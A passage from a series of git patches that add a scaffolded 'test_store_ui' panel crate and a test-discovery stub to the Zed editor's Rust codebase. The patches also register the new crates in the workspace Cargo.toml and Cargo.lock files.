length_penalty_for(s: &str, length_penalty: LengthPenalty) -> f64 { if length_penalty.is_on() { From 11942f95af8ae7188a71dd69931eb1f1f56b752e Mon Sep 17 00:00:00 2001 From: BEKs Date: Thu, 7 May 2026 17:15:12 +0300 Subject: [PATCH 225/231] created test_store ui component --- crates/test_store_ui/src/test_panel.rs | 39 +++++++++++++++++++++++ crates/test_store_ui/src/test_store_ui.rs | 14 ++++++++ 2 files changed, 53 insertions(+) create mode 100644 crates/test_store_ui/src/test_panel.rs create mode 100644 crates/test_store_ui/src/test_store_ui.rs diff --git a/crates/test_store_ui/src/test_panel.rs b/crates/test_store_ui/src/test_panel.rs new file mode 100644 index 00000000000000..b89f0e63fdca24 --- /dev/null +++ b/crates/test_store_ui/src/test_panel.rs @@ -0,0 +1,39 @@ +use gpui::{AppContext, AsyncWindowContext, Context, Entity, WeakEntity, Window}; + +use anyhow; +use workspace::Workspace; + +#[derive(Debug, Default)] +pub struct TestStorePanel { + test_suite_count: usize, + test_case_count: usize, + failed_test_count: usize, + passed_test_count: usize, + skipped_test_count: usize, +} + +impl TestStorePanel { + pub fn new( + workspace: &mut Workspace, + window: &mut Window, + cx: &mut Context, + ) -> Entity { + cx.new(|cx| Self { + test_case_count: 0, + test_suite_count: 0, + failed_test_count: 0, + passed_test_count: 0, + skipped_test_count: 0, + }) + } + + pub fn load( + workspace: WeakEntity, + mut cx: AsyncWindowContext, + ) -> anyhow::Result> { + workspace.update_in(&mut cx, |workspace, window, cx| { + let panel = Self::new(workspace, window, cx); + panel + }) + } +} diff --git a/crates/test_store_ui/src/test_store_ui.rs b/crates/test_store_ui/src/test_store_ui.rs new file mode 100644 index 00000000000000..dbee1cafed5bf9 --- /dev/null +++ b/crates/test_store_ui/src/test_store_ui.rs @@ -0,0 +1,14 @@ +use gpui::App; + +pub mod test_panel; + + +pub fn init(cx: &mut App) {} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn it_works() {} +} From 
5d732b3f76ae1c1970f154597e6d0b66dcfc659b Mon Sep 17 00:00:00 2001 From: BEKs Date: Thu, 7 May 2026 17:15:44 +0300 Subject: [PATCH 226/231] registered test_store_ui in zed project --- crates/test_store_ui/Cargo.toml | 19 +++++++++++++++++++ crates/zed/src/zed.rs | 3 +++ 2 files changed, 22 insertions(+) create mode 100644 crates/test_store_ui/Cargo.toml diff --git a/crates/test_store_ui/Cargo.toml b/crates/test_store_ui/Cargo.toml new file mode 100644 index 00000000000000..85ae541711a9c3 --- /dev/null +++ b/crates/test_store_ui/Cargo.toml @@ -0,0 +1,19 @@ +[package] +name = "test_store_ui" +version = "0.1.0" +publish.workspace = true +edition.workspace = true + +[lib] +path = "src/test_store_ui.rs" +doctest = false + +[dependencies] + +anyhow.workspace = true +workspace.workspace = true +project.workspace = true +gpui.workspace = true + +[lints] +workspace = true diff --git a/crates/zed/src/zed.rs b/crates/zed/src/zed.rs index 180d85440df347..e9cb5b87ca4e06 100644 --- a/crates/zed/src/zed.rs +++ b/crates/zed/src/zed.rs @@ -70,6 +70,7 @@ use settings::{ update_settings_file, }; use sidebar::Sidebar; +use test_store_ui::test_panel::TestStorePanel; use std::{ borrow::Cow, @@ -726,8 +727,10 @@ fn initialize_panels(window: &mut Window, cx: &mut Context) -> Task>> + 'static, workspace_handle: WeakEntity, From 6f04029f7c9b904a1de953a3726408108c9e29d1 Mon Sep 17 00:00:00 2001 From: BEKs Date: Thu, 7 May 2026 17:15:55 +0300 Subject: [PATCH 227/231] Update Cargo.toml --- crates/zed/Cargo.toml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/crates/zed/Cargo.toml b/crates/zed/Cargo.toml index d8ac8be3369f7f..bd726d1124d15f 100644 --- a/crates/zed/Cargo.toml +++ b/crates/zed/Cargo.toml @@ -197,6 +197,8 @@ tasks_ui.workspace = true telemetry.workspace = true telemetry_events.workspace = true terminal_view.workspace = true +test_store.workspace = true +test_store_ui.workspace = true theme.workspace = true theme_settings.workspace = true theme_extension.workspace = true From 
0775d8f71117ecf22aee55b19f634b09fed9a0a4 Mon Sep 17 00:00:00 2001 From: BEKs Date: Thu, 7 May 2026 17:16:27 +0300 Subject: [PATCH 228/231] added missing details to test_case and test_suite --- crates/test_store/src/test_case.rs | 2 ++ crates/test_store/src/test_suite.rs | 2 ++ 2 files changed, 4 insertions(+) diff --git a/crates/test_store/src/test_case.rs b/crates/test_store/src/test_case.rs index 72959ddef491d3..bbe8e44347f113 100644 --- a/crates/test_store/src/test_case.rs +++ b/crates/test_store/src/test_case.rs @@ -13,6 +13,8 @@ pub struct TestCase { pub runs: u16, // Tells the error information provided after the execution of the test case pub error_info: Option, + // Tells the name of the test case + pub name: String, } impl TestCase {} diff --git a/crates/test_store/src/test_suite.rs b/crates/test_store/src/test_suite.rs index eb7e8990ff5a38..97541396cfb833 100644 --- a/crates/test_store/src/test_suite.rs +++ b/crates/test_store/src/test_suite.rs @@ -12,5 +12,7 @@ pub struct TestSuite { pub count: u32, // The test cases in the test suite pub cases: Vec, + // Tells the name of the test suite + pub name: String, } impl TestSuite {} From b604fc9b6f8f0daef95f0d497094274d90a70163 Mon Sep 17 00:00:00 2001 From: BEKs Date: Thu, 7 May 2026 17:17:44 +0300 Subject: [PATCH 229/231] created scaffold for test_discovery --- crates/test_store/src/test_discovery.rs | 38 +++++++++++++++++++++++++ 1 file changed, 38 insertions(+) diff --git a/crates/test_store/src/test_discovery.rs b/crates/test_store/src/test_discovery.rs index e69de29bb2d1d6..07bb65b4b2826d 100644 --- a/crates/test_store/src/test_discovery.rs +++ b/crates/test_store/src/test_discovery.rs @@ -0,0 +1,38 @@ +use gpui::{App, AppContext, Context}; +use project::Project; +use workspace; + +#[derive(Debug, Default)] +pub struct TestDiscovery; + +impl TestDiscovery { + pub fn init(ctx: &mut App, project: &Project) -> Self { + Self + } + + // scan project to find all code files in project + pub fn scan(&self, cx: 
Context, proj: &Project) { + for workree in proj.worktrees(&cx).into_iter() { + let snapshot = workree.read(&cx).snapshot(); + + for entry in snapshot.entries(true, 0) { + // entry + // find test suites in each file. + if !entry.is_file() { + continue; + } + + // check for source file type + // Can I use any of the APIs in language crate to check for source files? + } + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_initializet_test_discovery() {} +} From 89220f714d4cb689fb325c81798103ed9a64f9c2 Mon Sep 17 00:00:00 2001 From: BEKs Date: Thu, 7 May 2026 17:18:12 +0300 Subject: [PATCH 230/231] added dependencies --- Cargo.toml | 4 +++- crates/test_store/Cargo.toml | 3 +++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/Cargo.toml b/Cargo.toml index 683592a35b9aba..7a4ba9650ec5bf 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -251,7 +251,7 @@ members = [ "tooling/compliance", "tooling/perf", "tooling/xtask", - "crates/test_store", + "crates/test_store", "crates/test_store_ui", ] default-members = ["crates/zed"] @@ -456,6 +456,8 @@ telemetry = { path = "crates/telemetry" } telemetry_events = { path = "crates/telemetry_events" } terminal = { path = "crates/terminal" } terminal_view = { path = "crates/terminal_view" } +test_store = { path = "crates/test_store" } +test_store_ui = { path = "crates/test_store_ui" } text = { path = "crates/text" } theme = { path = "crates/theme" } theme_extension = { path = "crates/theme_extension" } diff --git a/crates/test_store/Cargo.toml b/crates/test_store/Cargo.toml index 034213b9ba597b..46fbcc11b59ffb 100644 --- a/crates/test_store/Cargo.toml +++ b/crates/test_store/Cargo.toml @@ -10,6 +10,9 @@ path = "src/test_store.rs" doctest = false [dependencies] +project.workspace = true +workspace.workspace = true +gpui.workspace = true [lints] workspace = true From 825196bcf232a8f114bef0e1bb6e2c29948b085b Mon Sep 17 00:00:00 2001 From: BEKs Date: Thu, 7 May 2026 17:18:47 +0300 Subject: [PATCH 231/231] 
test_store package lock --- Cargo.lock | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/Cargo.lock b/Cargo.lock index f35cb8bbfb2f23..6fdf7c7679f90d 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -17866,6 +17866,21 @@ dependencies = [ [[package]] name = "test_store" version = "0.1.0" +dependencies = [ + "gpui", + "project", + "workspace", +] + +[[package]] +name = "test_store_ui" +version = "0.1.0" +dependencies = [ + "anyhow", + "gpui", + "project", + "workspace", +] [[package]] name = "text" @@ -22538,6 +22553,8 @@ dependencies = [ "telemetry_events", "tempfile", "terminal_view", + "test_store", + "test_store_ui", "theme", "theme_extension", "theme_selector",